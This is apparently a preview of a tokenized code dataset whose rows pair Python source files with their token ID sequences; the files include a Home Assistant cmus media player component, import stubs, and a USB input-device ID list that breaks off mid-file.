content
stringlengths 1
1.04M
| input_ids
sequencelengths 1
774k
| ratio_char_token
float64 0.38
22.9
| token_count
int64 1
774k
|
---|---|---|---|
# 「テキストエディター」エリア → ヘッダー
import bpy
from . import common
from . import compat
# メニュー等に項目追加
@compat.BlRegister()
@compat.BlRegister()
@compat.BlRegister()
@compat.BlRegister()
| [
2,
40283,
24336,
25084,
43302,
23544,
40629,
23376,
6312,
13700,
23544,
12675,
11839,
15168,
14524,
246,
14777,
27852,
6312,
198,
11748,
275,
9078,
198,
6738,
764,
1330,
2219,
198,
6738,
764,
1330,
8330,
628,
198,
2,
14524,
94,
30165,
24440,
6312,
163,
255,
231,
28618,
165,
254,
227,
33566,
106,
164,
4204,
27950,
254,
628,
198,
31,
5589,
265,
13,
3629,
38804,
3419,
628,
198,
31,
5589,
265,
13,
3629,
38804,
3419,
628,
198,
31,
5589,
265,
13,
3629,
38804,
3419,
628,
198,
31,
5589,
265,
13,
3629,
38804,
3419,
198
] | 2.021978 | 91 |
from loader import Loader
from metadataloader import WrongHeaderException
from metadataloader import MetaDataLoader
| [
6738,
40213,
1330,
8778,
263,
198,
6738,
1138,
324,
10254,
1170,
263,
1330,
28843,
39681,
16922,
198,
6738,
1138,
324,
10254,
1170,
263,
1330,
30277,
6601,
17401,
198
] | 4.142857 | 28 |
"""
Support for interacting with and controlling the cmus music player.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/media_player.cmus/
"""
import logging
import voluptuous as vol
from homeassistant.components.media_player import (
MEDIA_TYPE_MUSIC, MEDIA_TYPE_PLAYLIST, SUPPORT_NEXT_TRACK, SUPPORT_PAUSE,
SUPPORT_PREVIOUS_TRACK, SUPPORT_TURN_OFF, SUPPORT_TURN_ON, SUPPORT_PLAY,
SUPPORT_VOLUME_SET, SUPPORT_PLAY_MEDIA, SUPPORT_SEEK, PLATFORM_SCHEMA,
MediaPlayerDevice)
from homeassistant.const import (
STATE_OFF, STATE_PAUSED, STATE_PLAYING, CONF_HOST, CONF_NAME, CONF_PORT,
CONF_PASSWORD)
import homeassistant.helpers.config_validation as cv
REQUIREMENTS = ['pycmus==0.1.0']
_LOGGER = logging.getLogger(__name__)
DEFAULT_NAME = 'cmus'
DEFAULT_PORT = 3000
SUPPORT_CMUS = SUPPORT_PAUSE | SUPPORT_VOLUME_SET | SUPPORT_TURN_OFF | \
SUPPORT_TURN_ON | SUPPORT_PREVIOUS_TRACK | SUPPORT_NEXT_TRACK | \
SUPPORT_PLAY_MEDIA | SUPPORT_SEEK | SUPPORT_PLAY
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Inclusive(CONF_HOST, 'remote'): cv.string,
vol.Inclusive(CONF_PASSWORD, 'remote'): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
})
def setup_platform(hass, config, add_devices, discover_info=None):
"""Setup the CMUS platform."""
from pycmus import exceptions
host = config.get(CONF_HOST)
password = config.get(CONF_PASSWORD)
port = config.get(CONF_PORT)
name = config.get(CONF_NAME)
try:
cmus_remote = CmusDevice(host, password, port, name)
except exceptions.InvalidPassword:
_LOGGER.error("The provided password was rejected by cmus")
return False
add_devices([cmus_remote])
class CmusDevice(MediaPlayerDevice):
"""Representation of a running cmus."""
# pylint: disable=no-member
def __init__(self, server, password, port, name):
"""Initialize the CMUS device."""
from pycmus import remote
if server:
self.cmus = remote.PyCmus(
server=server, password=password, port=port)
auto_name = 'cmus-{}'.format(server)
else:
self.cmus = remote.PyCmus()
auto_name = 'cmus-local'
self._name = name or auto_name
self.status = {}
self.update()
def update(self):
"""Get the latest data and update the state."""
status = self.cmus.get_status_dict()
if not status:
_LOGGER.warning("Recieved no status from cmus")
else:
self.status = status
@property
def name(self):
"""Return the name of the device."""
return self._name
@property
def state(self):
"""Return the media state."""
if self.status.get('status') == 'playing':
return STATE_PLAYING
elif self.status.get('status') == 'paused':
return STATE_PAUSED
else:
return STATE_OFF
@property
def media_content_id(self):
"""Content ID of current playing media."""
return self.status.get('file')
@property
def content_type(self):
"""Content type of the current playing media."""
return MEDIA_TYPE_MUSIC
@property
def media_duration(self):
"""Duration of current playing media in seconds."""
return self.status.get('duration')
@property
def media_title(self):
"""Title of current playing media."""
return self.status['tag'].get('title')
@property
def media_artist(self):
"""Artist of current playing media, music track only."""
return self.status['tag'].get('artist')
@property
def media_track(self):
"""Track number of current playing media, music track only."""
return self.status['tag'].get('tracknumber')
@property
def media_album_name(self):
"""Album name of current playing media, music track only."""
return self.status['tag'].get('album')
@property
def media_album_artist(self):
"""Album artist of current playing media, music track only."""
return self.status['tag'].get('albumartist')
@property
def volume_level(self):
"""Return the volume level."""
left = self.status['set'].get('vol_left')[0]
right = self.status['set'].get('vol_right')[0]
if left != right:
volume = float(left + right) / 2
else:
volume = left
return int(volume)/100
@property
def supported_features(self):
"""Flag media player features that are supported."""
return SUPPORT_CMUS
def turn_off(self):
"""Service to send the CMUS the command to stop playing."""
self.cmus.player_stop()
def turn_on(self):
"""Service to send the CMUS the command to start playing."""
self.cmus.player_play()
def set_volume_level(self, volume):
"""Set volume level, range 0..1."""
self.cmus.set_volume(int(volume * 100))
def volume_up(self):
"""Function to send CMUS the command for volume up."""
left = self.status['set'].get('vol_left')
right = self.status['set'].get('vol_right')
if left != right:
current_volume = float(left + right) / 2
else:
current_volume = left
if current_volume <= 100:
self.cmus.set_volume(int(current_volume) + 5)
def volume_down(self):
"""Function to send CMUS the command for volume down."""
left = self.status['set'].get('vol_left')
right = self.status['set'].get('vol_right')
if left != right:
current_volume = float(left + right) / 2
else:
current_volume = left
if current_volume <= 100:
self.cmus.set_volume(int(current_volume) - 5)
def play_media(self, media_type, media_id, **kwargs):
"""Send the play command."""
if media_type in [MEDIA_TYPE_MUSIC, MEDIA_TYPE_PLAYLIST]:
self.cmus.player_play_file(media_id)
else:
_LOGGER.error(
"Invalid media type %s. Only %s and %s are supported",
media_type, MEDIA_TYPE_MUSIC, MEDIA_TYPE_PLAYLIST)
def media_pause(self):
"""Send the pause command."""
self.cmus.player_pause()
def media_next_track(self):
"""Send next track command."""
self.cmus.player_next()
def media_previous_track(self):
"""Send next track command."""
self.cmus.player_prev()
def media_seek(self, position):
"""Send seek command."""
self.cmus.seek(position)
def media_play(self):
"""Send the play command."""
self.cmus.player_play()
def media_stop(self):
"""Send the stop command."""
self.cmus.stop()
| [
37811,
198,
15514,
329,
24986,
351,
290,
12755,
262,
12067,
385,
2647,
2137,
13,
198,
198,
1890,
517,
3307,
546,
428,
3859,
11,
3387,
3522,
284,
262,
10314,
379,
198,
5450,
1378,
11195,
12,
562,
10167,
13,
952,
14,
5589,
3906,
14,
11431,
62,
7829,
13,
11215,
385,
14,
198,
37811,
198,
11748,
18931,
198,
198,
11748,
2322,
37623,
5623,
355,
2322,
628,
198,
6738,
1363,
562,
10167,
13,
5589,
3906,
13,
11431,
62,
7829,
1330,
357,
198,
220,
220,
220,
26112,
3539,
62,
25216,
62,
44,
2937,
2149,
11,
26112,
3539,
62,
25216,
62,
31519,
45849,
11,
43333,
62,
45,
13918,
62,
5446,
8120,
11,
43333,
62,
4537,
19108,
11,
198,
220,
220,
220,
43333,
62,
46437,
12861,
20958,
62,
5446,
8120,
11,
43333,
62,
51,
27064,
62,
27977,
11,
43333,
62,
51,
27064,
62,
1340,
11,
43333,
62,
31519,
11,
198,
220,
220,
220,
43333,
62,
44558,
38340,
62,
28480,
11,
43333,
62,
31519,
62,
30733,
3539,
11,
43333,
62,
36078,
42,
11,
9297,
1404,
21389,
62,
50,
3398,
27630,
11,
198,
220,
220,
220,
6343,
14140,
24728,
8,
198,
6738,
1363,
562,
10167,
13,
9979,
1330,
357,
198,
220,
220,
220,
35454,
62,
27977,
11,
35454,
62,
4537,
2937,
1961,
11,
35454,
62,
31519,
2751,
11,
7102,
37,
62,
39,
10892,
11,
7102,
37,
62,
20608,
11,
7102,
37,
62,
15490,
11,
198,
220,
220,
220,
7102,
37,
62,
47924,
54,
12532,
8,
198,
11748,
1363,
562,
10167,
13,
16794,
364,
13,
11250,
62,
12102,
341,
355,
269,
85,
198,
198,
2200,
49128,
28957,
796,
37250,
9078,
11215,
385,
855,
15,
13,
16,
13,
15,
20520,
198,
198,
62,
25294,
30373,
796,
18931,
13,
1136,
11187,
1362,
7,
834,
3672,
834,
8,
198,
198,
7206,
38865,
62,
20608,
796,
705,
11215,
385,
6,
198,
7206,
38865,
62,
15490,
796,
20343,
198,
198,
40331,
15490,
62,
24187,
2937,
796,
43333,
62,
4537,
19108,
930,
43333,
62,
44558,
38340,
62,
28480,
930,
43333,
62,
51,
27064,
62,
27977,
930,
220,
3467,
198,
220,
220,
220,
43333,
62,
51,
27064,
62,
1340,
930,
43333,
62,
46437,
12861,
20958,
62,
5446,
8120,
930,
43333,
62,
45,
13918,
62,
5446,
8120,
930,
3467,
198,
220,
220,
220,
43333,
62,
31519,
62,
30733,
3539,
930,
43333,
62,
36078,
42,
930,
43333,
62,
31519,
198,
198,
6489,
1404,
21389,
62,
50,
3398,
27630,
796,
9297,
1404,
21389,
62,
50,
3398,
27630,
13,
2302,
437,
15090,
198,
220,
220,
220,
2322,
13,
818,
5731,
7,
10943,
37,
62,
39,
10892,
11,
705,
47960,
6,
2599,
269,
85,
13,
8841,
11,
198,
220,
220,
220,
2322,
13,
818,
5731,
7,
10943,
37,
62,
47924,
54,
12532,
11,
705,
47960,
6,
2599,
269,
85,
13,
8841,
11,
198,
220,
220,
220,
2322,
13,
30719,
7,
10943,
37,
62,
15490,
11,
4277,
28,
7206,
38865,
62,
15490,
2599,
269,
85,
13,
634,
11,
198,
220,
220,
220,
2322,
13,
30719,
7,
10943,
37,
62,
20608,
11,
4277,
28,
7206,
38865,
62,
20608,
2599,
269,
85,
13,
8841,
11,
198,
30072,
628,
198,
4299,
9058,
62,
24254,
7,
71,
562,
11,
4566,
11,
751,
62,
42034,
11,
7073,
62,
10951,
28,
14202,
2599,
198,
220,
220,
220,
37227,
40786,
262,
16477,
2937,
3859,
526,
15931,
198,
220,
220,
220,
422,
12972,
11215,
385,
1330,
13269,
628,
220,
220,
220,
2583,
796,
4566,
13,
1136,
7,
10943,
37,
62,
39,
10892,
8,
198,
220,
220,
220,
9206,
796,
4566,
13,
1136,
7,
10943,
37,
62,
47924,
54,
12532,
8,
198,
220,
220,
220,
2493,
796,
4566,
13,
1136,
7,
10943,
37,
62,
15490,
8,
198,
220,
220,
220,
1438,
796,
4566,
13,
1136,
7,
10943,
37,
62,
20608,
8,
628,
220,
220,
220,
1949,
25,
198,
220,
220,
220,
220,
220,
220,
220,
12067,
385,
62,
47960,
796,
327,
14664,
24728,
7,
4774,
11,
9206,
11,
2493,
11,
1438,
8,
198,
220,
220,
220,
2845,
13269,
13,
44651,
35215,
25,
198,
220,
220,
220,
220,
220,
220,
220,
4808,
25294,
30373,
13,
18224,
7203,
464,
2810,
9206,
373,
8606,
416,
12067,
385,
4943,
198,
220,
220,
220,
220,
220,
220,
220,
1441,
10352,
198,
220,
220,
220,
751,
62,
42034,
26933,
11215,
385,
62,
47960,
12962,
628,
198,
4871,
327,
14664,
24728,
7,
13152,
14140,
24728,
2599,
198,
220,
220,
220,
37227,
40171,
341,
286,
257,
2491,
12067,
385,
526,
15931,
628,
220,
220,
220,
1303,
279,
2645,
600,
25,
15560,
28,
3919,
12,
19522,
198,
220,
220,
220,
825,
11593,
15003,
834,
7,
944,
11,
4382,
11,
9206,
11,
2493,
11,
1438,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
24243,
1096,
262,
16477,
2937,
3335,
526,
15931,
198,
220,
220,
220,
220,
220,
220,
220,
422,
12972,
11215,
385,
1330,
6569,
628,
220,
220,
220,
220,
220,
220,
220,
611,
4382,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
11215,
385,
796,
6569,
13,
20519,
34,
14664,
7,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4382,
28,
15388,
11,
9206,
28,
28712,
11,
2493,
28,
634,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
8295,
62,
3672,
796,
705,
11215,
385,
12,
90,
92,
4458,
18982,
7,
15388,
8,
198,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
11215,
385,
796,
6569,
13,
20519,
34,
14664,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
8295,
62,
3672,
796,
705,
11215,
385,
12,
12001,
6,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13557,
3672,
796,
1438,
393,
8295,
62,
3672,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
13376,
796,
23884,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
19119,
3419,
628,
220,
220,
220,
825,
4296,
7,
944,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
3855,
262,
3452,
1366,
290,
4296,
262,
1181,
526,
15931,
198,
220,
220,
220,
220,
220,
220,
220,
3722,
796,
2116,
13,
11215,
385,
13,
1136,
62,
13376,
62,
11600,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
611,
407,
3722,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4808,
25294,
30373,
13,
43917,
7203,
6690,
39591,
645,
3722,
422,
12067,
385,
4943,
198,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
13376,
796,
3722,
628,
220,
220,
220,
2488,
26745,
198,
220,
220,
220,
825,
1438,
7,
944,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
13615,
262,
1438,
286,
262,
3335,
526,
15931,
198,
220,
220,
220,
220,
220,
220,
220,
1441,
2116,
13557,
3672,
628,
220,
220,
220,
2488,
26745,
198,
220,
220,
220,
825,
1181,
7,
944,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
13615,
262,
2056,
1181,
526,
15931,
198,
220,
220,
220,
220,
220,
220,
220,
611,
2116,
13,
13376,
13,
1136,
10786,
13376,
11537,
6624,
705,
17916,
10354,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1441,
35454,
62,
31519,
2751,
198,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
2116,
13,
13376,
13,
1136,
10786,
13376,
11537,
6624,
705,
8957,
1484,
10354,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1441,
35454,
62,
4537,
2937,
1961,
198,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1441,
35454,
62,
27977,
628,
220,
220,
220,
2488,
26745,
198,
220,
220,
220,
825,
2056,
62,
11299,
62,
312,
7,
944,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
19746,
4522,
286,
1459,
2712,
2056,
526,
15931,
198,
220,
220,
220,
220,
220,
220,
220,
1441,
2116,
13,
13376,
13,
1136,
10786,
7753,
11537,
628,
220,
220,
220,
2488,
26745,
198,
220,
220,
220,
825,
2695,
62,
4906,
7,
944,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
19746,
2099,
286,
262,
1459,
2712,
2056,
526,
15931,
198,
220,
220,
220,
220,
220,
220,
220,
1441,
26112,
3539,
62,
25216,
62,
44,
2937,
2149,
628,
220,
220,
220,
2488,
26745,
198,
220,
220,
220,
825,
2056,
62,
32257,
7,
944,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
26054,
286,
1459,
2712,
2056,
287,
4201,
526,
15931,
198,
220,
220,
220,
220,
220,
220,
220,
1441,
2116,
13,
13376,
13,
1136,
10786,
32257,
11537,
628,
220,
220,
220,
2488,
26745,
198,
220,
220,
220,
825,
2056,
62,
7839,
7,
944,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
19160,
286,
1459,
2712,
2056,
526,
15931,
198,
220,
220,
220,
220,
220,
220,
220,
1441,
2116,
13,
13376,
17816,
12985,
6,
4083,
1136,
10786,
7839,
11537,
628,
220,
220,
220,
2488,
26745,
198,
220,
220,
220,
825,
2056,
62,
49016,
7,
944,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
43020,
286,
1459,
2712,
2056,
11,
2647,
2610,
691,
526,
15931,
198,
220,
220,
220,
220,
220,
220,
220,
1441,
2116,
13,
13376,
17816,
12985,
6,
4083,
1136,
10786,
49016,
11537,
628,
220,
220,
220,
2488,
26745,
198,
220,
220,
220,
825,
2056,
62,
11659,
7,
944,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
24802,
1271,
286,
1459,
2712,
2056,
11,
2647,
2610,
691,
526,
15931,
198,
220,
220,
220,
220,
220,
220,
220,
1441,
2116,
13,
13376,
17816,
12985,
6,
4083,
1136,
10786,
11659,
17618,
11537,
628,
220,
220,
220,
2488,
26745,
198,
220,
220,
220,
825,
2056,
62,
40916,
62,
3672,
7,
944,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
2348,
4435,
1438,
286,
1459,
2712,
2056,
11,
2647,
2610,
691,
526,
15931,
198,
220,
220,
220,
220,
220,
220,
220,
1441,
2116,
13,
13376,
17816,
12985,
6,
4083,
1136,
10786,
40916,
11537,
628,
220,
220,
220,
2488,
26745,
198,
220,
220,
220,
825,
2056,
62,
40916,
62,
49016,
7,
944,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
2348,
4435,
6802,
286,
1459,
2712,
2056,
11,
2647,
2610,
691,
526,
15931,
198,
220,
220,
220,
220,
220,
220,
220,
1441,
2116,
13,
13376,
17816,
12985,
6,
4083,
1136,
10786,
40916,
49016,
11537,
628,
220,
220,
220,
2488,
26745,
198,
220,
220,
220,
825,
6115,
62,
5715,
7,
944,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
13615,
262,
6115,
1241,
526,
15931,
198,
220,
220,
220,
220,
220,
220,
220,
1364,
796,
2116,
13,
13376,
17816,
2617,
6,
4083,
1136,
10786,
10396,
62,
9464,
11537,
58,
15,
60,
198,
220,
220,
220,
220,
220,
220,
220,
826,
796,
2116,
13,
13376,
17816,
2617,
6,
4083,
1136,
10786,
10396,
62,
3506,
11537,
58,
15,
60,
198,
220,
220,
220,
220,
220,
220,
220,
611,
1364,
14512,
826,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
6115,
796,
12178,
7,
9464,
1343,
826,
8,
1220,
362,
198,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
6115,
796,
1364,
198,
220,
220,
220,
220,
220,
220,
220,
1441,
493,
7,
29048,
20679,
3064,
628,
220,
220,
220,
2488,
26745,
198,
220,
220,
220,
825,
4855,
62,
40890,
7,
944,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
34227,
2056,
2137,
3033,
326,
389,
4855,
526,
15931,
198,
220,
220,
220,
220,
220,
220,
220,
1441,
43333,
62,
24187,
2937,
628,
220,
220,
220,
825,
1210,
62,
2364,
7,
944,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
16177,
284,
3758,
262,
16477,
2937,
262,
3141,
284,
2245,
2712,
526,
15931,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
11215,
385,
13,
7829,
62,
11338,
3419,
628,
220,
220,
220,
825,
1210,
62,
261,
7,
944,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
16177,
284,
3758,
262,
16477,
2937,
262,
3141,
284,
923,
2712,
526,
15931,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
11215,
385,
13,
7829,
62,
1759,
3419,
628,
220,
220,
220,
825,
900,
62,
29048,
62,
5715,
7,
944,
11,
6115,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
7248,
6115,
1241,
11,
2837,
657,
492,
16,
526,
15931,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
11215,
385,
13,
2617,
62,
29048,
7,
600,
7,
29048,
1635,
1802,
4008,
628,
220,
220,
220,
825,
6115,
62,
929,
7,
944,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
22203,
284,
3758,
16477,
2937,
262,
3141,
329,
6115,
510,
526,
15931,
198,
220,
220,
220,
220,
220,
220,
220,
1364,
796,
2116,
13,
13376,
17816,
2617,
6,
4083,
1136,
10786,
10396,
62,
9464,
11537,
198,
220,
220,
220,
220,
220,
220,
220,
826,
796,
2116,
13,
13376,
17816,
2617,
6,
4083,
1136,
10786,
10396,
62,
3506,
11537,
198,
220,
220,
220,
220,
220,
220,
220,
611,
1364,
14512,
826,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1459,
62,
29048,
796,
12178,
7,
9464,
1343,
826,
8,
1220,
362,
198,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1459,
62,
29048,
796,
1364,
628,
220,
220,
220,
220,
220,
220,
220,
611,
1459,
62,
29048,
19841,
1802,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
11215,
385,
13,
2617,
62,
29048,
7,
600,
7,
14421,
62,
29048,
8,
1343,
642,
8,
628,
220,
220,
220,
825,
6115,
62,
2902,
7,
944,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
22203,
284,
3758,
16477,
2937,
262,
3141,
329,
6115,
866,
526,
15931,
198,
220,
220,
220,
220,
220,
220,
220,
1364,
796,
2116,
13,
13376,
17816,
2617,
6,
4083,
1136,
10786,
10396,
62,
9464,
11537,
198,
220,
220,
220,
220,
220,
220,
220,
826,
796,
2116,
13,
13376,
17816,
2617,
6,
4083,
1136,
10786,
10396,
62,
3506,
11537,
198,
220,
220,
220,
220,
220,
220,
220,
611,
1364,
14512,
826,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1459,
62,
29048,
796,
12178,
7,
9464,
1343,
826,
8,
1220,
362,
198,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1459,
62,
29048,
796,
1364,
628,
220,
220,
220,
220,
220,
220,
220,
611,
1459,
62,
29048,
19841,
1802,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
11215,
385,
13,
2617,
62,
29048,
7,
600,
7,
14421,
62,
29048,
8,
532,
642,
8,
628,
220,
220,
220,
825,
711,
62,
11431,
7,
944,
11,
2056,
62,
4906,
11,
2056,
62,
312,
11,
12429,
46265,
22046,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
25206,
262,
711,
3141,
526,
15931,
198,
220,
220,
220,
220,
220,
220,
220,
611,
2056,
62,
4906,
287,
685,
30733,
3539,
62,
25216,
62,
44,
2937,
2149,
11,
26112,
3539,
62,
25216,
62,
31519,
45849,
5974,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
11215,
385,
13,
7829,
62,
1759,
62,
7753,
7,
11431,
62,
312,
8,
198,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4808,
25294,
30373,
13,
18224,
7,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
44651,
2056,
2099,
4064,
82,
13,
5514,
4064,
82,
290,
4064,
82,
389,
4855,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2056,
62,
4906,
11,
26112,
3539,
62,
25216,
62,
44,
2937,
2149,
11,
26112,
3539,
62,
25216,
62,
31519,
45849,
8,
628,
220,
220,
220,
825,
2056,
62,
32125,
7,
944,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
25206,
262,
14985,
3141,
526,
15931,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
11215,
385,
13,
7829,
62,
32125,
3419,
628,
220,
220,
220,
825,
2056,
62,
19545,
62,
11659,
7,
944,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
25206,
1306,
2610,
3141,
526,
15931,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
11215,
385,
13,
7829,
62,
19545,
3419,
628,
220,
220,
220,
825,
2056,
62,
3866,
1442,
62,
11659,
7,
944,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
25206,
1306,
2610,
3141,
526,
15931,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
11215,
385,
13,
7829,
62,
47050,
3419,
628,
220,
220,
220,
825,
2056,
62,
36163,
7,
944,
11,
2292,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
25206,
5380,
3141,
526,
15931,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
11215,
385,
13,
36163,
7,
9150,
8,
628,
220,
220,
220,
825,
2056,
62,
1759,
7,
944,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
25206,
262,
711,
3141,
526,
15931,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
11215,
385,
13,
7829,
62,
1759,
3419,
628,
220,
220,
220,
825,
2056,
62,
11338,
7,
944,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
37227,
25206,
262,
2245,
3141,
526,
15931,
198,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
11215,
385,
13,
11338,
3419,
198
] | 2.392292 | 2,906 |
from rest_framework import serializers
from rest_framework.exceptions import ValidationError
from core.models.template import HelpLink
| [
6738,
1334,
62,
30604,
1330,
11389,
11341,
198,
6738,
1334,
62,
30604,
13,
1069,
11755,
1330,
3254,
24765,
12331,
198,
198,
6738,
4755,
13,
27530,
13,
28243,
1330,
10478,
11280,
628
] | 4.419355 | 31 |
from __future__ import absolute_import, division, print_function, unicode_literals
from .config import *
from .data import *
from .display import *
from .helper import *
from .methods import *
from .misc import *
from .whiten import *
| [
6738,
11593,
37443,
834,
1330,
4112,
62,
11748,
11,
7297,
11,
3601,
62,
8818,
11,
28000,
1098,
62,
17201,
874,
198,
198,
6738,
764,
11250,
1330,
1635,
198,
6738,
764,
7890,
1330,
1635,
198,
6738,
764,
13812,
1330,
1635,
198,
6738,
764,
2978,
525,
1330,
1635,
198,
6738,
764,
24396,
82,
1330,
1635,
198,
6738,
764,
44374,
1330,
1635,
198,
6738,
764,
1929,
270,
268,
1330,
1635,
628,
198
] | 3.449275 | 69 |
#!/usr/bin/env python3
import os.path
import textwrap
# List of tuples ('idVendor', 'idProduct'), as four hexadecimal digits.
DEVICES = [
# Microsoft Microsoft Wireless Optical Desktop® 2.10
# Microsoft Wireless Desktop - Comfort Edition
('045e', '009d'),
# Microsoft Microsoft® Digital Media Pro Keyboard
# Microsoft Corp. Digital Media Pro Keyboard
('045e', '00b0'),
# Microsoft Microsoft® Digital Media Keyboard
# Microsoft Corp. Digital Media Keyboard 1.0A
('045e', '00b4'),
# Microsoft Microsoft® Digital Media Keyboard 3000
('045e', '0730'),
# Microsoft Microsoft® 2.4GHz Transceiver v6.0
# Microsoft Microsoft® 2.4GHz Transceiver v8.0
# Microsoft Corp. Nano Transceiver v1.0 for Bluetooth
# Microsoft Wireless Mobile Mouse 1000
# Microsoft Wireless Desktop 3000
('045e', '0745'),
# Microsoft® SideWinder(TM) 2.4GHz Transceiver
('045e', '0748'),
# Microsoft Corp. Wired Keyboard 600
('045e', '0750'),
# Microsoft Corp. Sidewinder X4 keyboard
('045e', '0768'),
# Microsoft Corp. Arc Touch Mouse Transceiver
('045e', '0773'),
# Microsoft® 2.4GHz Transceiver v9.0
# Microsoft® Nano Transceiver v2.1
# Microsoft Sculpt Ergonomic Keyboard (5KV-00001)
('045e', '07a5'),
# Microsoft® Nano Transceiver v1.0
# Microsoft Wireless Keyboard 800
('045e', '07b2'),
# Microsoft® Nano Transceiver v2.0
('045e', '0800'),
('046d', 'c30a'), # Logitech, Inc. iTouch Composite keboard
('04d9', 'a0df'), # Tek Syndicate Mouse (E-Signal USB Gaming Mouse)
# List of Wacom devices at: http://linuxwacom.sourceforge.net/wiki/index.php/Device_IDs
('056a', '0010'), # Wacom ET-0405 Graphire
('056a', '0011'), # Wacom ET-0405A Graphire2 (4x5)
('056a', '0012'), # Wacom ET-0507A Graphire2 (5x7)
('056a', '0013'), # Wacom CTE-430 Graphire3 (4x5)
('056a', '0014'), # Wacom CTE-630 Graphire3 (6x8)
('056a', '0015'), # Wacom CTE-440 Graphire4 (4x5)
('056a', '0016'), # Wacom CTE-640 Graphire4 (6x8)
('056a', '0017'), # Wacom CTE-450 Bamboo Fun (4x5)
('056a', '0018'), # Wacom CTE-650 Bamboo Fun 6x8
('056a', '0019'), # Wacom CTE-631 Bamboo One
('056a', '00d1'), # Wacom Bamboo Pen and Touch CTH-460
('056a', '030e'), # Wacom Intuos Pen (S) CTL-480
('09da', '054f'), # A4 Tech Co., G7 750 mouse
('09da', '1410'), # A4 Tech Co., Ltd Bloody AL9 mouse
('09da', '3043'), # A4 Tech Co., Ltd Bloody R8A Gaming Mouse
('09da', '31b5'), # A4 Tech Co., Ltd Bloody TL80 Terminator Laser Gaming Mouse
('09da', '3997'), # A4 Tech Co., Ltd Bloody RT7 Terminator Wireless
('09da', '3f8b'), # A4 Tech Co., Ltd Bloody V8 mouse
('09da', '51f4'), # Modecom MC-5006 Keyboard
('09da', '5589'), # A4 Tech Co., Ltd Terminator TL9 Laser Gaming Mouse
